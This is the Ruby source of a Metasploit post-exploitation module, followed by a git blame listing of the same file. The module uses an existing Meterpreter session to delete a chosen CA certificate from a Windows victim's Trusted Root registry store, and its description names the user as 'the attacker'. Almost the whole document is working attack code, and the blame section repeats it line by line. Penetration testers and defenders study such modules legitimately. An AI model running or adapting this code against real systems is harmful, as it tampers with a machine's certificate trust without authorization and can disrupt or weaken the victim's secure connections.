metasploit-framework/modules/post/windows/manage/remove_ca.rb

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Post

	def initialize(info={})
		super( update_info( info,
			'Name'          => 'Windows Manage Certificate Authority Removal',
			'Description'   => %q{
				This module allows the attacker to remove an arbitrary CA certificate
				from the victim's Trusted Root store.},
			'License'       => BSD_LICENSE,
			'Author'        => [ 'vt <nick.freeman[at]security-assessment.com>'],
			'Platform'      => [ 'win' ],
			'SessionTypes'  => [ 'meterpreter' ]
		))

		register_options(
			[
				OptString.new('CERTID', [ true, 'SHA1 hash of the certificate to remove.', '']),
			], self.class)
	end


	def run
		certtoremove = datastore['CERTID']

		open_key = nil
		key = "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\SystemCertificates\\ROOT\\Certificates"
		rkey,bkey = client.sys.registry.splitkey(key)

		# Check if the requested cert is actually in the registry to start with
		open_key = client.sys.registry.open_key(rkey, bkey, KEY_READ + 0x0000)
		keys = open_key.enum_key

		if (keys.length > 1)
			if (keys.include?(certtoremove))
				# We found our target
			else
				print_error("The specified CA is not in the registry.")
				return
			end
		else
			print_error("These are not the CAs you are looking for (i.e. this registry branch is empty)")
		end

		open_key = client.sys.registry.open_key(rkey, bkey, KEY_WRITE + 0x0000)
		open_key.delete_key(certtoremove)
		print_good("Successfully deleted CA: #{certtoremove}")
	end

end
These are the "myca" modules by Nick Freeman. Feature #5503 git-svn-id: file:///home/svn/framework3/trunk@14037 4d416f70-5f16-0410-b530-b9f4589650da 2011-10-23 17:17:32 +00:00			`##`
			`# This file is part of the Metasploit Framework and may be subject to`
			`# redistribution and commercial restrictions. Please see the Metasploit`
Fix up the boilerplate comment to use a better url 2012-02-21 01:40:50 +00:00			`# web site for more information on licensing and terms of use.`
			`# http://metasploit.com/`
These are the "myca" modules by Nick Freeman. Feature #5503 git-svn-id: file:///home/svn/framework3/trunk@14037 4d416f70-5f16-0410-b530-b9f4589650da 2011-10-23 17:17:32 +00:00			`##`

			`require 'msf/core'`

			`class Metasploit3 < Msf::Post`

			`def initialize(info={})`
			`super( update_info( info,`
Fix title to be consistent 2012-06-19 17:58:42 +00:00			`'Name' => 'Windows Manage Certificate Authority Removal',`
These are the "myca" modules by Nick Freeman. Feature #5503 git-svn-id: file:///home/svn/framework3/trunk@14037 4d416f70-5f16-0410-b530-b9f4589650da 2011-10-23 17:17:32 +00:00			`'Description' => %q{`
			`This module allows the attacker to remove an arbitrary CA certificate`
			`from the victim's Trusted Root store.},`
			`'License' => BSD_LICENSE,`
			`'Author' => [ 'vt <nick.freeman[at]security-assessment.com>'],`
Platform windows cleanup Change all Platform 'windows' to 'win', as it internally is an alias anyway and only causes unnecessary confusion to have two platform names that mean the same. 2012-10-23 18:33:01 +00:00			`'Platform' => [ 'win' ],`
These are the "myca" modules by Nick Freeman. Feature #5503 git-svn-id: file:///home/svn/framework3/trunk@14037 4d416f70-5f16-0410-b530-b9f4589650da 2011-10-23 17:17:32 +00:00			`'SessionTypes' => [ 'meterpreter' ]`
			`))`

			`register_options(`
			`[`
fixes a syntax error. git-svn-id: file:///home/svn/framework3/trunk@14053 4d416f70-5f16-0410-b530-b9f4589650da 2011-10-24 22:43:27 +00:00			`OptString.new('CERTID', [ true, 'SHA1 hash of the certificate to remove.', '']),`
These are the "myca" modules by Nick Freeman. Feature #5503 git-svn-id: file:///home/svn/framework3/trunk@14037 4d416f70-5f16-0410-b530-b9f4589650da 2011-10-23 17:17:32 +00:00			`], self.class)`
			`end`


			`def run`
			`certtoremove = datastore['CERTID']`

			`open_key = nil`
			`key = "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\SystemCertificates\\ROOT\\Certificates"`
			`rkey,bkey = client.sys.registry.splitkey(key)`

msftidy on post modules for spaces at EOL 2011-11-20 01:53:25 +00:00			`# Check if the requested cert is actually in the registry to start with`
These are the "myca" modules by Nick Freeman. Feature #5503 git-svn-id: file:///home/svn/framework3/trunk@14037 4d416f70-5f16-0410-b530-b9f4589650da 2011-10-23 17:17:32 +00:00			`open_key = client.sys.registry.open_key(rkey, bkey, KEY_READ + 0x0000)`
			`keys = open_key.enum_key`

			`if (keys.length > 1)`
			`if (keys.include?(certtoremove))`
			`# We found our target`
			`else`
			`print_error("The specified CA is not in the registry.")`
			`return`
			`end`
			`else`
			`print_error("These are not the CAs you are looking for (i.e. this registry branch is empty)")`
			`end`

			`open_key = client.sys.registry.open_key(rkey, bkey, KEY_WRITE + 0x0000)`
			`open_key.delete_key(certtoremove)`
			`print_good("Successfully deleted CA: #{certtoremove}")`
			`end`

			`end`